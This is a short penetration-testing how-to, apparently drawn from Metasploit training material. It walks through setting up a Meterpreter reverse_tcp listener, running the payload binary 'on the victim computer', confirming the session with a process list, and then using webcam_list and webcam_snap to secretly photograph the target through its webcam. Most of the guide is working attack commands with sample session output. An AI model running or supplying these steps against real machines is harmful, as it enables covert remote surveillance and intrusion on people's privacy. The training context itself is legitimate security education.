Webcam Capture
Introduction
The collection phase holds significance in the penetration testing methodology, and Meterpreter provides a module enabling the capture of webcam shots from a targeted laptop or workstation.
Step-by-Step Guide
1. Create the meterpreter binary
How-To: Creating a Meterpreter Binary
2. Create and run a listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit
3. Execute your meterpreter binary on the victim computer
4. Confirm connection
Sample (run ‘ps’):
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Pro
cess]
4 0 System
224 4 smss.exe
296 288 csrss.exe
308 432 svchost.exe
344 288 wininit.exe
356 336 csrss.exe
396 336 winlogon.exe
432 344 services.exe
440 344 lsass.exe
...
5. Check webcam list
meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
5. Run webscam_snap
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.
OPTIONS:
-h Help Banner
-i The index of the webcam to use (Default: 1)
-p The JPEG image path (Default: 'gnFjTnzi.jpeg')
-q The JPEG image quality (Default: '50')
-v Automatically view the JPEG image (Default: 'true')
meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
Reference
https://www.offsec.com/metasploit-unleashed/meterpreter-basics/#webcam_snap